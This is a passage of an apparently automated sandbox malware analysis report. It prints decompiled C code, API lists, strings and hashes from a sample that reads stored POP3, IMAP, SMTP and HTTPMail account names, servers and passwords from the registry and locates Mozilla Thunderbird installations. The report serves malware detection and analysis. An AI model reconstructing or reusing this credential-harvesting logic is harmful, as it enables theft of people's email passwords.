					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E0040492F( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                                                                                                                                        0x0040a88e
                                                                                                                                                                        0x0040a88f
                                                                                                                                                                        0x0040a893
                                                                                                                                                                        0x0040a89c
                                                                                                                                                                        0x0040a89f
                                                                                                                                                                        0x0040a8a7
                                                                                                                                                                        0x0040a8aa
                                                                                                                                                                        0x0040a8ad
                                                                                                                                                                        0x0040a8b0
                                                                                                                                                                        0x0040a8b3
                                                                                                                                                                        0x0040a8b9
                                                                                                                                                                        0x0040a8ba
                                                                                                                                                                        0x0040a8bb
                                                                                                                                                                        0x0040a8c2
                                                                                                                                                                        0x0040a8c9
                                                                                                                                                                        0x0040a8cd
                                                                                                                                                                        0x0040a8d0
                                                                                                                                                                        0x0040a8d3
                                                                                                                                                                        0x0040a8db
                                                                                                                                                                        0x0040a8dc
                                                                                                                                                                        0x0040a8dd
                                                                                                                                                                        0x0040a8e4
                                                                                                                                                                        0x0040a8eb
                                                                                                                                                                        0x0040a8ef
                                                                                                                                                                        0x0040a8f2
                                                                                                                                                                        0x0040a8f5
                                                                                                                                                                        0x0040a8fd
                                                                                                                                                                        0x0040a8fe
                                                                                                                                                                        0x0040a8ff
                                                                                                                                                                        0x0040a906
                                                                                                                                                                        0x0040a90d
                                                                                                                                                                        0x0040a911
                                                                                                                                                                        0x0040a914
                                                                                                                                                                        0x0040a917
                                                                                                                                                                        0x0040a91f
                                                                                                                                                                        0x0040a920
                                                                                                                                                                        0x0040a921
                                                                                                                                                                        0x0040a928
                                                                                                                                                                        0x0040a92f
                                                                                                                                                                        0x0040a933
                                                                                                                                                                        0x0040a936
                                                                                                                                                                        0x0040a939
                                                                                                                                                                        0x0040a941
                                                                                                                                                                        0x0040a942
                                                                                                                                                                        0x0040a943
                                                                                                                                                                        0x0040a946
                                                                                                                                                                        0x0040a94d
                                                                                                                                                                        0x0040a951
                                                                                                                                                                        0x0040a954
                                                                                                                                                                        0x0040a957
                                                                                                                                                                        0x0040a95f
                                                                                                                                                                        0x0040a960
                                                                                                                                                                        0x0040a961
                                                                                                                                                                        0x0040a968
                                                                                                                                                                        0x0040a96f
                                                                                                                                                                        0x0040a973
                                                                                                                                                                        0x0040a976
                                                                                                                                                                        0x0040a979
                                                                                                                                                                        0x0040a981
                                                                                                                                                                        0x0040a982
                                                                                                                                                                        0x0040a983
                                                                                                                                                                        0x0040a98a
                                                                                                                                                                        0x0040a991
                                                                                                                                                                        0x0040a995
                                                                                                                                                                        0x0040a998
                                                                                                                                                                        0x0040a99b
                                                                                                                                                                        0x0040a99e
                                                                                                                                                                        0x0040a9a7
                                                                                                                                                                        0x0040a9aa
                                                                                                                                                                        0x0040a9ab
                                                                                                                                                                        0x0040a9ac
                                                                                                                                                                        0x0040a9b1
                                                                                                                                                                        0x0040a9bb
                                                                                                                                                                        0x0040a9c1
                                                                                                                                                                        0x0040a9dc
                                                                                                                                                                        0x0040a9ee
                                                                                                                                                                        0x0040a9f4
                                                                                                                                                                        0x0040aa41
                                                                                                                                                                        0x0040aa79
                                                                                                                                                                        0x0040aa7e
                                                                                                                                                                        0x0040aa84
                                                                                                                                                                        0x0040aa8c
                                                                                                                                                                        0x0040aa98
                                                                                                                                                                        0x0040aa9b
                                                                                                                                                                        0x0040aac4
                                                                                                                                                                        0x0040aac4
                                                                                                                                                                        0x0040aacc
                                                                                                                                                                        0x0040aae7
                                                                                                                                                                        0x0040aaf3
                                                                                                                                                                        0x0040aaf5
                                                                                                                                                                        0x0040aaf5
                                                                                                                                                                        0x0040aafc
                                                                                                                                                                        0x0040ab02
                                                                                                                                                                        0x0040ab08
                                                                                                                                                                        0x0040ab11
                                                                                                                                                                        0x0040ab26
                                                                                                                                                                        0x0040ab13
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab22
                                                                                                                                                                        0x0040ab18
                                                                                                                                                                        0x0040ab1d
                                                                                                                                                                        0x0040ab1d
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab2b
                                                                                                                                                                        0x0040ab30
                                                                                                                                                                        0x0040ab31
                                                                                                                                                                        0x0040ab3a
                                                                                                                                                                        0x0040ab46
                                                                                                                                                                        0x0040ab46
                                                                                                                                                                        0x0040ab4f
                                                                                                                                                                        0x0040ab5a
                                                                                                                                                                        0x0040ab6c
                                                                                                                                                                        0x0040ab7d
                                                                                                                                                                        0x0040ab7f
                                                                                                                                                                        0x0040ab8d
                                                                                                                                                                        0x0040ab95
                                                                                                                                                                        0x0040ab95
                                                                                                                                                                        0x0040ab8d
                                                                                                                                                                        0x0040aba1
                                                                                                                                                                        0x0040aba3
                                                                                                                                                                        0x0040abaf
                                                                                                                                                                        0x0040abb3
                                                                                                                                                                        0x0040abb9
                                                                                                                                                                        0x0040abd4
                                                                                                                                                                        0x0040abbb
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abd1
                                                                                                                                                                        0x0040abe0
                                                                                                                                                                        0x0040abe4
                                                                                                                                                                        0x0040abe5
                                                                                                                                                                        0x0040abfc
                                                                                                                                                                        0x0040ac06
                                                                                                                                                                        0x0040ac0e
                                                                                                                                                                        0x0040ac10
                                                                                                                                                                        0x0040ac16
                                                                                                                                                                        0x0040ac27
                                                                                                                                                                        0x0040ac43
                                                                                                                                                                        0x0040ac4a
                                                                                                                                                                        0x0040ac51
                                                                                                                                                                        0x0040ac6d
                                                                                                                                                                        0x0040aa9d
                                                                                                                                                                        0x0040aa9d
                                                                                                                                                                        0x0040aaa0
                                                                                                                                                                        0x0040aaa3
                                                                                                                                                                        0x0040aaab
                                                                                                                                                                        0x0040aab4
                                                                                                                                                                        0x0040aab9
                                                                                                                                                                        0x0040aabc
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040aaa3

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                          • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 0040A9C1
                                                                                                                                                                        • #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
                                                                                                                                                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A9F4
                                                                                                                                                                        • LoadImageA.USER32 ref: 0040AA0A
                                                                                                                                                                        • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 0040AA6A
                                                                                                                                                                        • LoadIconA.USER32(00000066,00000000), ref: 0040AAD9
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
                                                                                                                                                                        • _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
                                                                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
                                                                                                                                                                        • SetFocus.USER32(?,00000000), ref: 0040AB6C
                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00418660), ref: 0040AB85
                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00418660), ref: 0040AB95
                                                                                                                                                                        • strlen.MSVCRT ref: 0040AB9C
                                                                                                                                                                        • strlen.MSVCRT ref: 0040ABAA
                                                                                                                                                                        • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
                                                                                                                                                                          • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
                                                                                                                                                                          • Part of subcall function 0040492F: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
                                                                                                                                                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AC51
                                                                                                                                                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AC64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                                                                                                        • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                        • API String ID: 873469642-933021314
                                                                                                                                                                        • Opcode ID: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                        • Instruction ID: e1998a72efec4b56c1f9895f5ce6fdd1159dce7011e853ef75bd655fd4d55b37
                                                                                                                                                                        • Opcode Fuzzy Hash: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                        • Instruction Fuzzy Hash: DBB10071644388EFEB16CF74C845BDABFB5BF14304F00406AF644A7292C7B9A954CB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004025C5 Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                        			E004025C5(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040F1F1(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E00402197(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040F1F1(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040F1F1(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040F1F1(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040F1F1(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040242B(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E004023C6(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                                                                                                                        0x004025c5
                                                                                                                                                                        0x004025c5
                                                                                                                                                                        0x004025c6
                                                                                                                                                                        0x004025ca
                                                                                                                                                                        0x004025d3
                                                                                                                                                                        0x004025da
                                                                                                                                                                        0x004025e1
                                                                                                                                                                        0x004025e8
                                                                                                                                                                        0x004025ef
                                                                                                                                                                        0x004025f6
                                                                                                                                                                        0x004025fd
                                                                                                                                                                        0x00402604
                                                                                                                                                                        0x0040260b
                                                                                                                                                                        0x00402612
                                                                                                                                                                        0x00402619
                                                                                                                                                                        0x00402620
                                                                                                                                                                        0x00402627
                                                                                                                                                                        0x0040262e
                                                                                                                                                                        0x00402635
                                                                                                                                                                        0x0040263c
                                                                                                                                                                        0x00402643
                                                                                                                                                                        0x0040264a
                                                                                                                                                                        0x00402651
                                                                                                                                                                        0x00402658
                                                                                                                                                                        0x0040265f
                                                                                                                                                                        0x00402661
                                                                                                                                                                        0x00402669
                                                                                                                                                                        0x0040266d
                                                                                                                                                                        0x00402675
                                                                                                                                                                        0x00402678
                                                                                                                                                                        0x0040267b
                                                                                                                                                                        0x0040267f
                                                                                                                                                                        0x00402684
                                                                                                                                                                        0x00402685
                                                                                                                                                                        0x0040268a
                                                                                                                                                                        0x0040268f
                                                                                                                                                                        0x0040269b
                                                                                                                                                                        0x004026ab
                                                                                                                                                                        0x004026b3
                                                                                                                                                                        0x004026b6
                                                                                                                                                                        0x004026bc
                                                                                                                                                                        0x004026bf
                                                                                                                                                                        0x004026cb
                                                                                                                                                                        0x004026cc
                                                                                                                                                                        0x004026d0
                                                                                                                                                                        0x004026d3
                                                                                                                                                                        0x004026d4
                                                                                                                                                                        0x004026df
                                                                                                                                                                        0x004026e0
                                                                                                                                                                        0x004026e5
                                                                                                                                                                        0x004026e8
                                                                                                                                                                        0x004026e9
                                                                                                                                                                        0x004026f4
                                                                                                                                                                        0x004026f5
                                                                                                                                                                        0x004026fa
                                                                                                                                                                        0x004026fd
                                                                                                                                                                        0x004026fe
                                                                                                                                                                        0x00402703
                                                                                                                                                                        0x00402709
                                                                                                                                                                        0x00402711
                                                                                                                                                                        0x00402712
                                                                                                                                                                        0x00402717
                                                                                                                                                                        0x0040271a
                                                                                                                                                                        0x0040271b
                                                                                                                                                                        0x00402720
                                                                                                                                                                        0x00402720
                                                                                                                                                                        0x0040272c
                                                                                                                                                                        0x0040273a
                                                                                                                                                                        0x0040273f
                                                                                                                                                                        0x00402750
                                                                                                                                                                        0x00402755
                                                                                                                                                                        0x00402768
                                                                                                                                                                        0x0040276e
                                                                                                                                                                        0x00402776
                                                                                                                                                                        0x00402776
                                                                                                                                                                        0x0040277b
                                                                                                                                                                        0x0040277c
                                                                                                                                                                        0x0040278c

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040266D
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026AB
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402768
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$QueryValuememset
                                                                                                                                                                        • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                        • API String ID: 3373037483-1627711381
                                                                                                                                                                        • Opcode ID: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                        • Instruction ID: 73c24e987151304ffccade67a91af9495e30ddb8d36a1dc6faba254672d7bb93
                                                                                                                                                                        • Opcode Fuzzy Hash: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                        • Instruction Fuzzy Hash: 534143B190021CBEDB31DF51CD49ADE7BA8AF04348F50457BF918A7291D3799A88CF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040278F Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 117stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                        			E0040278F(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t95;
				void* _t98;
				intOrPtr _t107;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t119;

				_t119 = __fp0;
				_t109 = _t111 - 0x70;
				_t112 = _t111 - 0x474;
				 *(_t109 + 0x40) = "POP3 Password";
				 *(_t109 + 0x44) = "IMAP Password";
				 *(_t109 + 0x48) = "HTTP Password";
				 *(_t109 + 0x4c) = "SMTP Password";
				 *(_t109 + 0x50) = "POP3 User";
				 *(_t109 + 0x54) = "IMAP User";
				 *(_t109 + 0x58) = "HTTP User";
				 *(_t109 + 0x5c) = "SMTP User";
				 *(_t109 + 0x20) = "POP3 Server";
				 *(_t109 + 0x24) = "IMAP Server";
				 *(_t109 + 0x28) = "HTTP Server URL";
				 *(_t109 + 0x2c) = "SMTP Server";
				 *(_t109 + 0x30) = "POP3 Port";
				 *(_t109 + 0x34) = "IMAP Port";
				 *(_t109 + 0x38) = "HTTP Port";
				 *(_t109 + 0x3c) = "SMTP Port";
				 *(_t109 + 0x60) = "POP3 Use SPA";
				 *(_t109 + 0x64) = "IMAP Use SPA";
				 *(_t109 + 0x68) = "HTTPMail Use SSL";
				 *(_t109 + 0x6c) = "SMTP Use SSL";
				_t95 = 0;
				do {
					 *(_t109 - 0x60) = 0;
					memset(_t109 - 0x5f, 0, 0x7f);
					_t112 = _t112 + 0xc;
					_t103 = _t95 << 2;
					_t66 = E00402963(_t109 - 0x60,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + (_t95 << 2) + 0x50)));
					if(_t66 != 0) {
						E00402197(_t109 - 0x404);
						strcpy(_t109 - 0x1f0, _t109 - 0x60);
						_t107 =  *((intOrPtr*)(_t109 + 0x78));
						_pop(_t98);
						 *((intOrPtr*)(_t109 - 0x378)) =  *((intOrPtr*)(_t107 + 0xb1c));
						_t37 = _t95 + 1; // 0x1
						 *((intOrPtr*)(_t109 - 0x1f4)) = _t37;
						E00402963(_t109 - 0x2f4,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x20)));
						E00402963(_t109 - 0x3f8,  *((intOrPtr*)(_t109 + 0x7c)), "Display Name");
						E00402963(_t109 - 0x374,  *((intOrPtr*)(_t109 + 0x7c)), "Email");
						if(_t95 != 3) {
							E00402963(_t109 - 0x274,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Server");
							E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Port", _t109 - 0x68);
							_t112 = _t112 + 0xc;
						}
						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x30)), _t109 - 0x70);
						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x60)), _t109 - 0x6c);
						_t112 = _t112 + 0x18;
						E0040242B(_t107, _t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x40)), _t109 - 0x170, 1);
						strcpy(_t109 - 0xf0, _t107 + 0xa9c);
						_t66 = E004023C6(_t109 - 0x404, _t119, _t107);
					}
					_t95 = _t95 + 1;
				} while (_t95 < 4);
				return _t66;
			}












                                                                                                                                                                        0x0040278f
                                                                                                                                                                        0x00402790
                                                                                                                                                                        0x00402794
                                                                                                                                                                        0x0040279d
                                                                                                                                                                        0x004027a4
                                                                                                                                                                        0x004027ab
                                                                                                                                                                        0x004027b2
                                                                                                                                                                        0x004027b9
                                                                                                                                                                        0x004027c0
                                                                                                                                                                        0x004027c7
                                                                                                                                                                        0x004027ce
                                                                                                                                                                        0x004027d5
                                                                                                                                                                        0x004027dc
                                                                                                                                                                        0x004027e3
                                                                                                                                                                        0x004027ea
                                                                                                                                                                        0x004027f1
                                                                                                                                                                        0x004027f8
                                                                                                                                                                        0x004027ff
                                                                                                                                                                        0x00402806
                                                                                                                                                                        0x0040280d
                                                                                                                                                                        0x00402814
                                                                                                                                                                        0x0040281b
                                                                                                                                                                        0x00402822
                                                                                                                                                                        0x00402829
                                                                                                                                                                        0x0040282b
                                                                                                                                                                        0x00402833
                                                                                                                                                                        0x00402837
                                                                                                                                                                        0x0040283c
                                                                                                                                                                        0x00402841
                                                                                                                                                                        0x0040284e
                                                                                                                                                                        0x00402855
                                                                                                                                                                        0x00402861
                                                                                                                                                                        0x00402871
                                                                                                                                                                        0x00402876
                                                                                                                                                                        0x00402880
                                                                                                                                                                        0x00402885
                                                                                                                                                                        0x0040288e
                                                                                                                                                                        0x00402891
                                                                                                                                                                        0x0040289d
                                                                                                                                                                        0x004028b0
                                                                                                                                                                        0x004028c3
                                                                                                                                                                        0x004028cb
                                                                                                                                                                        0x004028db
                                                                                                                                                                        0x004028ec
                                                                                                                                                                        0x004028f1
                                                                                                                                                                        0x004028f1
                                                                                                                                                                        0x004028ff
                                                                                                                                                                        0x0040290f
                                                                                                                                                                        0x00402914
                                                                                                                                                                        0x00402929
                                                                                                                                                                        0x0040293c
                                                                                                                                                                        0x0040294a
                                                                                                                                                                        0x0040294a
                                                                                                                                                                        0x0040294f
                                                                                                                                                                        0x00402950
                                                                                                                                                                        0x00402960

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00402837
                                                                                                                                                                          • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
                                                                                                                                                                        • strcpy.MSVCRT(?,?,73AFED80,?,00000000), ref: 00402871
                                                                                                                                                                          • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,73AFED80,?,00000000), ref: 0040293C
                                                                                                                                                                          • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValuestrcpy$ByteCharMultiWidememset
                                                                                                                                                                        • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                        • API String ID: 1302727986-4086712241
                                                                                                                                                                        • Opcode ID: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                        • Instruction ID: 308be4cc5b828d0a3e021f21c5187f9384b0cc6d4098b7245e54e25f5b72303c
                                                                                                                                                                        • Opcode Fuzzy Hash: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                        • Instruction Fuzzy Hash: D9410BB150024DABCF21EF61DD499DD7BA9FF04309F10816BF92466291D3B99A89CF48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FAA6 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E0040FAA6(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040F1B0(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040FA2B(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E0040617C(_t89);
							if(E0040FA2B(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040FA2B(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040F276(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00412114();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00412108();
							E0040F232(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041210E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040FA2B( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L0041207E();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040F276(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                                                                                                                        0x0040faba
                                                                                                                                                                        0x0040fac4
                                                                                                                                                                        0x0040faca
                                                                                                                                                                        0x0040fadc
                                                                                                                                                                        0x0040fae2
                                                                                                                                                                        0x0040faf5
                                                                                                                                                                        0x0040faf7
                                                                                                                                                                        0x0040fafc
                                                                                                                                                                        0x0040fb01
